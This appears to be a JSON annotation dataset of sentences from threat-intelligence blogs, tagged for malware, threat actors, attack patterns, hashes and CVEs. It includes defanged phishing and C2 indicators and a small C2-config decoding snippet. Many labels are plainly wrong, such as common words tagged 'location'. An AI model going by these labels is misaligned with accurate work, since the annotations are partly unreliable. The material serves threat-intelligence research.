industry-leading security features and protections to keep our users safe.","entities":[{"id":50661,"label":"identity","start_offset":11,"end_offset":17}],"relations":[],"Comments":[]} {"id":8348,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") select x).ToList","entities":[],"relations":[],"Comments":[]} {"id":3637,"text":"Once Charlie has access to Alice\u2019s email account, he then finds email conversations between Alice and Bob, his ultimate target.","entities":[],"relations":[],"Comments":[]} {"id":4571,"text":"They continue to use the 'Browser in the Browser' phishing technique that TAG first observed and described in March.","entities":[{"id":50413,"label":"TIME","start_offset":110,"end_offset":115},{"id":50411,"label":"attack-pattern","start_offset":26,"end_offset":68},{"id":50412,"label":"identity","start_offset":74,"end_offset":77}],"relations":[],"Comments":[]} {"id":1967,"text":"Before starting analysis, we needed to set up a test environment.","entities":[],"relations":[],"Comments":[]} {"id":5342,"text":"Core component code that receives and decrypts data from the C&C server If something is received, it is decrypted and written to the main pipe.","entities":[],"relations":[],"Comments":[]} {"id":3262,"text":"1. The \u201cnotice\u201d handler is used for checking the connection with the C&C server.","entities":[],"relations":[],"Comments":[]} {"id":8691,"text":"No longer do groups need to have the technical expertise, now they just need resources.","entities":[{"id":26836,"label":"identity","start_offset":67,"end_offset":71}],"relations":[],"Comments":[]} {"id":9674,"text":"For the initial information packet, the backdoor also collects the following: Figure 15.","entities":[],"relations":[],"Comments":[]} {"id":5109,"text":"And the reason why I want to tackle this today is because I've had some conversations in the last few days that have really kind of hit that idea bulb that people don't truly understand how cybercriminals get away with their crimes in the organization.","entities":[],"relations":[],"Comments":[]} {"id":10404,"text":"A partial code snippet of AutoHotkeyu32.ahk Figure 5.","entities":[],"relations":[],"Comments":[]} {"id":2282,"text":"Furthermore, 3.5M users were warned before downloading a malicious file through Google Safe Browsing warnings.","entities":[{"id":47354,"label":"SOFTWARE","start_offset":80,"end_offset":100}],"relations":[],"Comments":[]} {"id":985,"text":" Conclusion Even popular third party monetization platforms are not always trustworthy.","entities":[],"relations":[],"Comments":[]} {"id":8193,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} {"id":13959,"text":"A successful attack on a company providing critical services will have rippling effects that will harm multiple sectors of society, which is why protecting these services should be a top priority.","entities":[],"relations":[],"Comments":[]} {"id":14257,"text":"Abusing popular platforms like GitHub enables threat actors like Winnti to maintain network persistence between compromised computers and their servers, while staying under the radar.","entities":[{"id":48451,"label":"threat-actor","start_offset":65,"end_offset":72}],"relations":[],"Comments":[]} {"id":1943,"text":"The header for a sample document can be seen below.","entities":[],"relations":[],"Comments":[]} {"id":4585,"text":"In March 2021, Microsoft kicked off the patch cycle early after releasing an advisory regarding the mass exploitation of four zero-days vulnerabilities by a Chinese Hacking group, HAFNIUM, on the on-premises versions of the Microsoft Exchange Server.","entities":[{"id":50436,"label":"TIME","start_offset":3,"end_offset":13},{"id":50437,"label":"identity","start_offset":15,"end_offset":24},{"id":50438,"label":"vulnerability","start_offset":126,"end_offset":151},{"id":50439,"label":"threat-actor","start_offset":180,"end_offset":187},{"id":50440,"label":"location","start_offset":157,"end_offset":164},{"id":50441,"label":"SOFTWARE","start_offset":196,"end_offset":249}],"relations":[{"id":971,"from_id":50439,"to_id":50440,"type":"located-at"},{"id":972,"from_id":50439,"to_id":50438,"type":"exploits"},{"id":973,"from_id":50441,"to_id":50438,"type":"has"}],"Comments":[]} {"id":3425,"text":" fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851","entities":[{"id":10318,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":1712,"text":"In this case a legitimate service (Tor) was being abused by CryptoWall so it could avoid having its C2 servers shut down.","entities":[{"id":5086,"label":"malware","start_offset":60,"end_offset":70},{"id":5085,"label":"tools","start_offset":35,"end_offset":38}],"relations":[{"id":249,"from_id":5086,"to_id":5085,"type":"uses"}],"Comments":[]} {"id":522,"text":"For example, the URL links can be posted on forums or chat group software, sent by IM applications, offered via fake freeware for download or attached in emails.","entities":[{"id":45793,"label":"attack-pattern","start_offset":112,"end_offset":125},{"id":46149,"label":"attack-pattern","start_offset":142,"end_offset":160}],"relations":[],"Comments":[]} {"id":4799,"text":"Google\u2019s Threat Analysis Group (TAG) continues to closely monitor the cybersecurity environment in Eastern Europe with regard to the war in Ukraine.","entities":[{"id":50699,"label":"location","start_offset":140,"end_offset":147},{"id":50697,"label":"identity","start_offset":0,"end_offset":36},{"id":50698,"label":"identity","start_offset":99,"end_offset":113}],"relations":[],"Comments":[]} {"id":11942,"text":"We terminated 9 YouTube channels as part of our investigation into coordinated influence operations linked to China.","entities":[],"relations":[],"Comments":[]} {"id":4010,"text":"To mitigate such risk, organizations must think globally and exert efforts to follow codes of local culture.","entities":[],"relations":[],"Comments":[]} {"id":9630,"text":"This is shown in the figure below.","entities":[],"relations":[],"Comments":[]} {"id":5277,"text":"Mobile","entities":[],"relations":[],"Comments":[]} {"id":3310,"text":"The command that we received showed that the targeted browsers include Google Chrome, Microsoft Edge Beta, 360 Chrome, QQ Browser, 2345 Explorer, Sogou Explorer, and 360 Safe Browser.","entities":[{"id":48390,"label":"SOFTWARE","start_offset":71,"end_offset":84},{"id":48394,"label":"SOFTWARE","start_offset":131,"end_offset":144},{"id":48395,"label":"SOFTWARE","start_offset":146,"end_offset":160},{"id":48396,"label":"SOFTWARE","start_offset":166,"end_offset":182},{"id":48391,"label":"SOFTWARE","start_offset":86,"end_offset":105},{"id":48392,"label":"SOFTWARE","start_offset":107,"end_offset":117},{"id":48393,"label":"SOFTWARE","start_offset":119,"end_offset":129}],"relations":[],"Comments":[]} {"id":6099,"text":"Recently, FireEye published a blog titled \u201cOperation Poisoned Hurricane\u201d which detailed the use of PlugX malware variants signed with legitimate certificates that used Google Code project pages for command and control (C2).","entities":[{"id":18858,"label":"location","start_offset":62,"end_offset":71},{"id":18859,"label":"malware","start_offset":99,"end_offset":104},{"id":18860,"label":"location","start_offset":206,"end_offset":209}],"relations":[],"Comments":[]} {"id":4331,"text":"Stage 4 is the final payload (analyzed in the next section).","entities":[],"relations":[],"Comments":[]} {"id":12646,"text":"Secret key generation","entities":[],"relations":[],"Comments":[]} {"id":411,"text":"As that trend shows no sign of slowing down anytime soon, we can expect this to remain a very lucrative avenue for attackers.","entities":[],"relations":[],"Comments":[]} {"id":5474,"text":"Its latest version can mute the device (i.e., take out the ringtone and vibration features) and sync call logs and SMSs.","entities":[],"relations":[],"Comments":[]} {"id":11187,"text":"We have seen it deployed against fewer than two dozen accounts located in Iran.","entities":[],"relations":[],"Comments":[]} {"id":10118,"text":"Backdoor.","entities":[],"relations":[],"Comments":[]} {"id":65,"text":"A normal PC used to mine Monero can earn around US$0.25 per day at the current prices.","entities":[{"id":45824,"label":"SOFTWARE","start_offset":25,"end_offset":31}],"relations":[],"Comments":[]} {"id":10153,"text":"We were able to collect evidence that credential phishing emails were sent to chmail.ir users on May 18, 2017, just one day before the presidential elections in Iran.","entities":[{"id":30973,"label":"attack-pattern","start_offset":49,"end_offset":57}],"relations":[],"Comments":[]} {"id":7724,"text":"The .NET downloads jm1 \u2014 an .MSI installer \u2014 that installs another NSIS installer, leading to a ServHelper infection in the system.","entities":[{"id":23993,"label":"malware","start_offset":67,"end_offset":71},{"id":23994,"label":"malware","start_offset":96,"end_offset":106}],"relations":[],"Comments":[]} {"id":1128,"text":"With the appropriate tools it\u2019s possible to enable a single researcher to continually review and categorize new mutexes.","entities":[],"relations":[],"Comments":[]} {"id":10235,"text":" Recap of recent Pawn Storm activities Compromising accounts of users from the Middle East Trend Micro has been closely and consistently monitoring the activities of Pawn Storm, and in March 2020, we released our latest research on the group.","entities":[{"id":31264,"label":"location","start_offset":120,"end_offset":123},{"id":31265,"label":"threat-actor","start_offset":166,"end_offset":176},{"id":31266,"label":"location","start_offset":178,"end_offset":181}],"relations":[],"Comments":[]} {"id":7857,"text":"As of July 7, this includes 85.8% of active Android devices.","entities":[],"relations":[],"Comments":[]} {"id":8199,"text":"Table 1. Domains registered using the email address ","entities":[],"relations":[],"Comments":[]} {"id":913,"text":"By comparison, the latest version of the CryptoWall malware family takes roughly 1-3 minutes to complete its encryption routine.","entities":[{"id":2888,"label":"malware","start_offset":41,"end_offset":51},{"id":2889,"label":"TIME","start_offset":73,"end_offset":92}],"relations":[],"Comments":[]} {"id":583,"text":"Cortex XDR endpoint protection stops malware, exploits and ransomware before they can compromise endpoints.","entities":[{"id":46179,"label":"SOFTWARE","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":2972,"text":"Preferably, find a password manager that requires two-factor authentication. 2. Protect Your Home Routers and Wi-Fi:","entities":[],"relations":[],"Comments":[]} {"id":1161,"text":"If this functionality were available in some more open source setting, and was of even moderate quality, we would expect to see it used in other malware families as well.","entities":[],"relations":[],"Comments":[]} {"id":6008,"text":"Recently observed IPs used in Curious Gorge campaigns: COLDRIVER, a Russian-based threat actor sometimes referred to as Calisto, has launched credential phishing campaigns, targeting several US based NGOs and think tanks, the military of a Balkans country, and a Ukraine based defense contractor.","entities":[{"id":18535,"label":"attack-pattern","start_offset":153,"end_offset":161},{"id":18537,"label":"location","start_offset":205,"end_offset":208},{"id":18539,"label":"location","start_offset":257,"end_offset":260}],"relations":[],"Comments":[]} {"id":230,"text":" Figure 9. hxxps:\/\/startrackzm[.]com\/wap-admin\/ONE-DRIVE\/one%20d%20%20no%20auto.php?Email=REDACTED@REDACTED.gov.ua.","entities":[{"id":45930,"label":"URL","start_offset":11,"end_offset":114}],"relations":[],"Comments":[]} {"id":4462,"text":"We remediated the compromises for these users and implemented controls to protect all Android users.","entities":[{"id":50246,"label":"SOFTWARE","start_offset":86,"end_offset":93}],"relations":[],"Comments":[]} {"id":9650,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":1874,"text":"The below example shows that the blocking works (output from the \"sc start\" command):","entities":[],"relations":[],"Comments":[]} {"id":2140,"text":"With this addition protection available, our customers can and should include that as part of their decisions around security and deployment of the security updates and their risk assessment of the vulnerability and threat environment.","entities":[],"relations":[],"Comments":[]} {"id":12680,"text":"As announced today, Google has taken action to disrupt the operations of Glupteba, a multi-component botnet targeting Windows computers.","entities":[{"id":39345,"label":"location","start_offset":37,"end_offset":43},{"id":39346,"label":"malware","start_offset":73,"end_offset":81}],"relations":[],"Comments":[]} {"id":1899,"text":"Upon writing this entry, we\u2019ve coordinated with Google to ensure that the malicious applications these C&C sites advertise are no longer available for download on the Google Play Store.","entities":[{"id":45172,"label":"identity","start_offset":48,"end_offset":54},{"id":45173,"label":"SOFTWARE","start_offset":167,"end_offset":184}],"relations":[],"Comments":[]} {"id":2347,"text":"We updated our operating system with the latest patch at the time (2021-004) and tried the exploit again.","entities":[{"id":47401,"label":"TIME","start_offset":67,"end_offset":75}],"relations":[],"Comments":[]} {"id":13080,"text":"What are your thoughts on the ransomware attacks on retailers as we approach the busiest times of the year for retailers, including Black Friday, Cyber Monday and the holiday season?","entities":[],"relations":[],"Comments":[]} {"id":6483,"text":"LIGOLO execution example","entities":[],"relations":[],"Comments":[]} {"id":2421,"text":"This means that web users can get a class object remotely by simply submitting a URL as shown in Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":4044,"text":"Fortunately, we were still able to collect the decryption key in some cases and we decrypted the payload successfully.","entities":[],"relations":[],"Comments":[]} {"id":6765,"text":"In 2018, CERT-UA published an advisory against the malware Pterodo, which the group allegedly used.","entities":[],"relations":[],"Comments":[]} {"id":9911,"text":"The APT33 actors then issue commands to the bots and collect data from the bots using these VPN connections.","entities":[{"id":30245,"label":"threat-actor","start_offset":4,"end_offset":9},{"id":30246,"label":"location","start_offset":22,"end_offset":27},{"id":30247,"label":"location","start_offset":49,"end_offset":52}],"relations":[],"Comments":[]} {"id":10621,"text":"Although much of Sandworm\u2019s activity targeting Ukraine and their attacks against the 2018 Winter Olympics have been covered publicly, some campaigns have not been reported.","entities":[{"id":32401,"label":"location","start_offset":9,"end_offset":13},{"id":32402,"label":"threat-actor","start_offset":17,"end_offset":25},{"id":32404,"label":"location","start_offset":55,"end_offset":58}],"relations":[],"Comments":[]} {"id":5060,"text":"Recently observed COLDRIVER credential phishing domains: Ghostwriter, a Belarusian threat actor, recently introduced a new capability into their credential phishing campaigns.","entities":[{"id":51165,"label":"location","start_offset":72,"end_offset":82},{"id":51166,"label":"campaign","start_offset":145,"end_offset":174},{"id":15621,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":15623,"label":"threat-actor","start_offset":57,"end_offset":68}],"relations":[{"id":1064,"from_id":15623,"to_id":51165,"type":"located-at"},{"id":1065,"from_id":15623,"to_id":51166,"type":"uses"}],"Comments":[]} {"id":11485,"text":"The app is distributed under the guise of performing Denial of Service (DoS) attacks against a set of Russian websites.","entities":[],"relations":[],"Comments":[]} {"id":9990,"text":"View active directory objects dsquery.exe DsQuery","entities":[{"id":30504,"label":"location","start_offset":0,"end_offset":4},{"id":30505,"label":"malware","start_offset":30,"end_offset":41},{"id":30506,"label":"malware","start_offset":42,"end_offset":49}],"relations":[],"Comments":[]} {"id":4730,"text":"Among other targets, this spyware was used to compromise journalists and opposition politicians.","entities":[],"relations":[],"Comments":[]} {"id":2125,"text":"The following two conditions must both be met for a system to be vulnerable to attack: If your Struts application does not meet both of these conditions, your application may still be vulnerable but not (currently) exploitable via CVE-2018-11776.","entities":[{"id":47262,"label":"vulnerability","start_offset":232,"end_offset":246},{"id":47263,"label":"SOFTWARE","start_offset":96,"end_offset":102}],"relations":[],"Comments":[]} {"id":8258,"text":"The obfuscation used was not particularly sophisticated.","entities":[],"relations":[],"Comments":[]} {"id":183,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) ","entities":[],"relations":[],"Comments":[]} {"id":1857,"text":" Figure 24. Running more system network configuration discovery scans","entities":[{"id":5442,"label":"attack-pattern","start_offset":29,"end_offset":67}],"relations":[],"Comments":[]} {"id":13617,"text":"This oplib.dll library is then sideloaded.","entities":[{"id":51707,"label":"FILEPATH","start_offset":5,"end_offset":14}],"relations":[],"Comments":[]} {"id":6519,"text":" MITRE ATT&CK Techniques Mapping Tactic Technique Resource Development Acquire Infrastructure: Web Services \u2013 T1583.006 Initial Access Phishing: Spearphishing Attachment \u2013 T1566.001 Phishing: Spearphishing Link \u2013 T1566.002 Execution Command and Scripting Interpreter: PowerShell \u2013 T1059.001","entities":[{"id":20197,"label":"attack-pattern","start_offset":142,"end_offset":150},{"id":20198,"label":"attack-pattern","start_offset":152,"end_offset":176},{"id":20199,"label":"attack-pattern","start_offset":189,"end_offset":197},{"id":20200,"label":"attack-pattern","start_offset":199,"end_offset":217},{"id":20201,"label":"location","start_offset":250,"end_offset":253},{"id":20202,"label":"attack-pattern","start_offset":254,"end_offset":263},{"id":20203,"label":"attack-pattern","start_offset":277,"end_offset":287}],"relations":[],"Comments":[]} {"id":2317,"text":"It was interesting to see the use of Capstone.js, a port of the Capstone disassembly framework, in an exploit chain as Capstone is typically used for binary analysis.","entities":[{"id":47388,"label":"SOFTWARE","start_offset":37,"end_offset":48},{"id":47391,"label":"SOFTWARE","start_offset":119,"end_offset":127},{"id":47390,"label":"SOFTWARE","start_offset":64,"end_offset":94}],"relations":[],"Comments":[]} {"id":3494,"text":"b64_data = str[len(\"magnet:?xt=urn:bhih:\"): tail] b64_decode = base64.b64decode(b64_data) key = ord(b64_decode[2]) data = b64_decode[4:] output_file = open(\"C2_info\", \"wb\") for single_byte in data: output_file.write(chr(ord(single_byte) ^ key)) output_file.close()","entities":[],"relations":[],"Comments":[]} {"id":4652,"text":"A new form is displayed if the information is not provided via command prompt.","entities":[],"relations":[],"Comments":[]} {"id":1150,"text":"\u201cjh\u201d itself is more common than would be expected given that, with fingers on the home row, it requires the right index finger to move and press another key before any other key is struck.","entities":[],"relations":[],"Comments":[]} {"id":474,"text":" What can I do about it?","entities":[],"relations":[],"Comments":[]} {"id":1319,"text":" FormerFirstRAT This remote administration tool (RAT) is referred to as \u201cFormerFirstRAT\u201d by its authors.","entities":[{"id":3989,"label":"malware","start_offset":1,"end_offset":15},{"id":3992,"label":"malware","start_offset":74,"end_offset":88}],"relations":[],"Comments":[]} {"id":2414,"text":"It contains the core, beans, context and Spring Expression Language (SpEL) modules.","entities":[{"id":47492,"label":"SOFTWARE","start_offset":41,"end_offset":74}],"relations":[],"Comments":[]} {"id":558,"text":"During the operation, 25.1 BTC from 538 wallets was sent to 1NDyJtNTjmwk5xPNhjgAMu4HDHigtobu1s (SHA256: CE11703DEF517306326C48A67A7C859A3DE0F18E2451DF226CE171389A5B7953), which is a wallet owned by Binance cryptocurrency exchange.","entities":[{"id":1845,"label":"SHA2","start_offset":104,"end_offset":168},{"id":44776,"label":"identity","start_offset":198,"end_offset":229}],"relations":[{"id":164,"from_id":44776,"to_id":1845,"type":"owns"}],"Comments":[]} {"id":5247,"text":"Sphinx was active between June 2014 and November 2015, but timestamps of the malware indicate the attacks started as early as 2011.","entities":[{"id":51283,"label":"TIME","start_offset":26,"end_offset":35},{"id":51285,"label":"TIME","start_offset":126,"end_offset":130},{"id":51282,"label":"campaign","start_offset":0,"end_offset":6},{"id":51284,"label":"TIME","start_offset":40,"end_offset":53}],"relations":[],"Comments":[]} {"id":14186,"text":"Oil and gas, banking and defense sectors are most likely to top of the list of targets.","entities":[],"relations":[],"Comments":[]} {"id":9102,"text":"During this time we developed URL-based signatures and used them to detect Lurk-related network traffic.","entities":[{"id":28099,"label":"location","start_offset":12,"end_offset":16},{"id":28100,"label":"location","start_offset":51,"end_offset":54},{"id":28101,"label":"location","start_offset":60,"end_offset":64},{"id":28102,"label":"malware","start_offset":75,"end_offset":79}],"relations":[],"Comments":[]} {"id":5023,"text":"Similar to recently observed activity, these campaigns were sent via email and contained a unique link per target that led to a DOCX file hosted on attacker controlled infrastructure.","entities":[],"relations":[],"Comments":[]} {"id":14196,"text":"But on top of that, organizations must have the detection and response tooling, ideally XDR, to correlate, prioritize and act on high fidelity alerts with speed and precision.","entities":[],"relations":[],"Comments":[]} {"id":5334,"text":" The server must reply with an exact four-byte answer, which is the victim's IPv4 address.","entities":[],"relations":[],"Comments":[]} {"id":3045,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":5211,"text":"Table 3 shows that the BAF is greater than one, implying there are asymmetric network flows although the values are at the order of magnitude lower than modern amplification attacks (note that Memcached can reach 10,000 to 51,000 BAF).","entities":[],"relations":[],"Comments":[]} {"id":11549,"text":"This group also has links to the original developers of H-Worm, also known as njRAT.","entities":[{"id":35390,"label":"malware","start_offset":78,"end_offset":83}],"relations":[],"Comments":[]} {"id":5165,"text":"How are you looking for visibility across all of your systems?","entities":[],"relations":[],"Comments":[]} {"id":2308,"text":"The macOS exploits did not use the same framework as iOS ones.","entities":[{"id":47374,"label":"SOFTWARE","start_offset":4,"end_offset":9},{"id":47375,"label":"SOFTWARE","start_offset":53,"end_offset":56}],"relations":[],"Comments":[]} {"id":11173,"text":"We terminated 1,312 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to China.","entities":[],"relations":[],"Comments":[]} {"id":13729,"text":"The typical Waterbear infection chain Figure 1.","entities":[{"id":42690,"label":"tools","start_offset":12,"end_offset":21}],"relations":[],"Comments":[]} {"id":13343,"text":"The screenshot in Figure 2 shows how the threat actor uses SMB and internal IIS Web Service to copy \"lc.tmp\" (the main ransomware loader in this incident) to other victims' host machines.","entities":[{"id":41526,"label":"location","start_offset":63,"end_offset":66},{"id":41527,"label":"attack-pattern","start_offset":80,"end_offset":91},{"id":41528,"label":"location","start_offset":173,"end_offset":177}],"relations":[],"Comments":[]} {"id":12356,"text":"Shortly after the U.S. Treasury sanctioned Ukrainian Parliament member Andrii Derkach for attempting to influence the U.S. electoral process, we removed 14 Google accounts that were linked to him.","entities":[],"relations":[],"Comments":[]} {"id":11193,"text":" HYPERSCRAPE requires the victim\u2019s account credentials to run using a valid, authenticated user session the attacker has hijacked, or credentials the attacker has already acquired.","entities":[],"relations":[],"Comments":[]} {"id":8123,"text":" Figure 10. Steps FileCrypt Manager prompts user to do","entities":[],"relations":[],"Comments":[]} {"id":12824,"text":"Similar Objectives.","entities":[],"relations":[],"Comments":[]} {"id":10605,"text":"In the past, we\u2019ve posted on issues like phishing campaigns, vulnerabilities and disinformation.","entities":[{"id":32350,"label":"attack-pattern","start_offset":41,"end_offset":49},{"id":32351,"label":"location","start_offset":77,"end_offset":80}],"relations":[],"Comments":[]} {"id":4170,"text":" Code Similarity","entities":[],"relations":[],"Comments":[]} {"id":1884,"text":"In the process of monitoring changes in the threat landscape, we get a clearer insight into the way threat actors work behind the schemes.","entities":[],"relations":[],"Comments":[]} {"id":5554,"text":"They use a one-time generated series of numbers for each transaction, so that if attackers get their hands on it, they won\u2019t be able to use it in the future.","entities":[],"relations":[],"Comments":[]} {"id":3893,"text":"According to the agency, critical infrastructure owners and operators should also adopt an \"heightened state of awareness\".","entities":[],"relations":[],"Comments":[]} {"id":4823,"text":"Ghostwriter\/UNC1151, a threat actor attributed to Belarus, has remained active targeting accounts of webmail and social media networks of Polish users.","entities":[{"id":50766,"label":"threat-actor","start_offset":0,"end_offset":11},{"id":50767,"label":"threat-actor","start_offset":12,"end_offset":19},{"id":50768,"label":"location","start_offset":50,"end_offset":57}],"relations":[{"id":1011,"from_id":50767,"to_id":50766,"type":"duplicate-of"},{"id":1012,"from_id":50766,"to_id":50768,"type":"attributed-to"}],"Comments":[]} {"id":7071,"text":"On two occasions (in March and October 2020), we found a kernel rootkit that had been deployed.","entities":[{"id":22150,"label":"location","start_offset":27,"end_offset":30},{"id":22152,"label":"attack-pattern","start_offset":64,"end_offset":71}],"relations":[],"Comments":[]} {"id":5219,"text":"Proper supply chain management processes allow contextualization, tracking, and monitoring of new vulnerabilities within different downstream software using a specific library such as DDS.","entities":[],"relations":[],"Comments":[]} {"id":9348,"text":"It also receives commands from the C&C server to take screenshots, which it later sends to the server.","entities":[],"relations":[],"Comments":[]} {"id":13695,"text":"Here are some tips on how to stay protected from email scams: ","entities":[],"relations":[],"Comments":[]} {"id":1819,"text":"Additional tools and components were copied to the compromised machine using AnyDeskMSI to scan the local network and disable security products.","entities":[{"id":46934,"label":"tools","start_offset":77,"end_offset":87},{"id":46936,"label":"attack-pattern","start_offset":91,"end_offset":113},{"id":46937,"label":"attack-pattern","start_offset":118,"end_offset":143}],"relations":[{"id":265,"from_id":46934,"to_id":46936,"type":"uses"},{"id":266,"from_id":46934,"to_id":46937,"type":"uses"}],"Comments":[]} {"id":7269,"text":"Arrival","entities":[],"relations":[],"Comments":[]} {"id":2699,"text":" In August 2021, a Russian blogger published a 22-minute interview with an alleged representative of the group behind LockBit 2.0 called \u201cLockBitSupp\u201d on a YouTube channel called \u201cRussian-language open source intelligence (OSINT).\u201d","entities":[{"id":47935,"label":"location","start_offset":18,"end_offset":26},{"id":47934,"label":"TIME","start_offset":4,"end_offset":15},{"id":47936,"label":"threat-actor","start_offset":118,"end_offset":129},{"id":47937,"label":"SOFTWARE","start_offset":156,"end_offset":163}],"relations":[],"Comments":[]} {"id":450,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":2142,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) ","entities":[],"relations":[],"Comments":[]} {"id":3733,"text":"The CISA Alert also calls out CVE-2022-22972 and CVE-2022-22973 \u2013 published on the same day and affecting the same products \u2013 as being highly likely to be exploited.","entities":[{"id":49540,"label":"identity","start_offset":4,"end_offset":8},{"id":49542,"label":"vulnerability","start_offset":49,"end_offset":63},{"id":49541,"label":"vulnerability","start_offset":30,"end_offset":44}],"relations":[],"Comments":[]} {"id":3400,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0 Silverlight.exe","entities":[{"id":10263,"label":"malware","start_offset":0,"end_offset":11},{"id":10264,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49064,"label":"malware","start_offset":20,"end_offset":44},{"id":49065,"label":"FILEPATH","start_offset":112,"end_offset":127}],"relations":[{"id":636,"from_id":10263,"to_id":49064,"type":"duplicate-of"},{"id":637,"from_id":49065,"to_id":10264,"type":"duplicate-of"},{"id":638,"from_id":10264,"to_id":49064,"type":"indicates"},{"id":639,"from_id":49065,"to_id":49064,"type":"indicates"}],"Comments":[]} {"id":8432,"text":"On Gmail, we recommend certain Gmail security precautions to prevent spoofing, phishing, and spam.","entities":[{"id":25986,"label":"location","start_offset":37,"end_offset":45},{"id":25987,"label":"attack-pattern","start_offset":79,"end_offset":87},{"id":25988,"label":"location","start_offset":89,"end_offset":92}],"relations":[],"Comments":[]} {"id":941,"text":"These apps are not hosted inside the Google Play store, but are distributed via third party distribution mechanisms in China.","entities":[{"id":46453,"label":"SOFTWARE","start_offset":37,"end_offset":54},{"id":46454,"label":"location","start_offset":119,"end_offset":124}],"relations":[],"Comments":[]} {"id":4397,"text":"Accept-Encoding: gzip Connection: Keep-Alive","entities":[],"relations":[],"Comments":[]} {"id":10265,"text":"The different versions of gdrive.exe are almost identical, with a minor addition to the file 2060f1e108f5feb5790320c38931e3dc6c7224edf925bf6f1840351578bbf9cc of base64 encoding on the victim\u2019s id.","entities":[{"id":31369,"label":"location","start_offset":37,"end_offset":40},{"id":31370,"label":"location","start_offset":66,"end_offset":71},{"id":31371,"label":"SHA2","start_offset":93,"end_offset":157}],"relations":[],"Comments":[]} {"id":8967,"text":"Unverified developer warning with the \u201cOpen\u201d button enabled","entities":[],"relations":[],"Comments":[]} {"id":3885,"text":"The guidance provides steps to prepare for, mitigate against, and respond to attacks.","entities":[],"relations":[],"Comments":[]} {"id":1282,"text":"Figure 7 shows the relationship between these backdoors and their respective command and control servers.","entities":[],"relations":[],"Comments":[]} {"id":464,"text":"To get that list of domains that the malware will use, defenders have to decode the algorithm which can be difficult.","entities":[],"relations":[],"Comments":[]} {"id":4148,"text":" Figure 12.","entities":[],"relations":[],"Comments":[]} {"id":6332,"text":"It was uploaded to VirusTotal on May 19, 2022, from Sri Lanka.","entities":[],"relations":[],"Comments":[]} {"id":440,"text":"That site\u2019s owner is the attacker.","entities":[],"relations":[],"Comments":[]} {"id":8514,"text":"We blocked 1.6M messages to targets, displayed ~62K Safe Browsing phishing page warnings, blocked 2.4K files, and successfully restored ~4K accounts.","entities":[{"id":26294,"label":"location","start_offset":52,"end_offset":56},{"id":26295,"label":"attack-pattern","start_offset":66,"end_offset":74},{"id":26296,"label":"location","start_offset":75,"end_offset":79},{"id":26299,"label":"location","start_offset":110,"end_offset":113}],"relations":[],"Comments":[]} {"id":1153,"text":" The second mutex appears to be a concerted effort to make the mutex seem \u201cmore random\u201d than the first.","entities":[],"relations":[],"Comments":[]} {"id":3349,"text":"The domains and the PDB string have been mentioned in a recent report and have been attributed to the Winnti Group.","entities":[{"id":48962,"label":"threat-actor","start_offset":102,"end_offset":114}],"relations":[],"Comments":[]} {"id":10263,"text":"The message box that decrypt.exe displays ","entities":[],"relations":[],"Comments":[]} {"id":11267,"text":"Gather information on an endpoint Gathers information from the endpoint such as the current logged on user, operating system details, IP address, hostname, mac address","entities":[],"relations":[],"Comments":[]} {"id":3719,"text":"In both Carbanak and FIN7 attacks, communication with users\u2019 compromised systems is done through bypassing firewalls or network detection systems via commonly used ports, using connection proxies to avoid direct connections to the threat group\u2019s infrastructure, employing the command-and-control channel to remotely copy files from an external system, blending in with existing network traffic by using standard application layer protocol, and taking advantage of standard cryptographic protocol to disguise command-and-control traffic.","entities":[{"id":49518,"label":"threat-actor","start_offset":8,"end_offset":16},{"id":49519,"label":"threat-actor","start_offset":21,"end_offset":25},{"id":49520,"label":"attack-pattern","start_offset":97,"end_offset":116},{"id":49521,"label":"attack-pattern","start_offset":171,"end_offset":195},{"id":49522,"label":"attack-pattern","start_offset":352,"end_offset":393}],"relations":[{"id":817,"from_id":49518,"to_id":49519,"type":"related-to"},{"id":818,"from_id":49519,"to_id":49520,"type":"uses"},{"id":819,"from_id":49519,"to_id":49521,"type":"uses"},{"id":820,"from_id":49519,"to_id":49522,"type":"uses"}],"Comments":[]} {"id":2492,"text":"Unit 42 researchers are proactively monitoring info related to other recently disclosed Spring vulnerabilities and will proceed to provide coverage as soon as more info has become available.","entities":[{"id":7440,"label":"identity","start_offset":0,"end_offset":7},{"id":47576,"label":"SOFTWARE","start_offset":88,"end_offset":94}],"relations":[],"Comments":[]} {"id":1708,"text":" Last year we highlighted two malware families on this blog: CryptoWall 2.0 and Dyreza\/Dyre.","entities":[{"id":46883,"label":"malware","start_offset":61,"end_offset":75},{"id":46884,"label":"malware","start_offset":80,"end_offset":86},{"id":46885,"label":"malware","start_offset":87,"end_offset":91}],"relations":[{"id":247,"from_id":46884,"to_id":46885,"type":"duplicate-of"}],"Comments":[]} {"id":5668,"text":"This finding sparked an investigation that led us to identify, with high confidence, multiple online services offered by the individuals operating the Glupteba botnet.","entities":[{"id":17458,"label":"location","start_offset":73,"end_offset":83},{"id":17459,"label":"malware","start_offset":151,"end_offset":159}],"relations":[],"Comments":[]} {"id":1650,"text":"While many users breeze past the list of permissions required when installing new apps, readers of this blog should ask themselves, \u201cDoes my electronic bible need to read my SMS messages?\u201d Sign up to receive the latest news, cyber threat intelligence and research from us ","entities":[],"relations":[],"Comments":[]} {"id":2893,"text":"local7","entities":[],"relations":[],"Comments":[]} {"id":10000,"text":"It is a variant of PlugX malware, and connects to the same C&C server (66[.]42[.]37[.]101). Figure 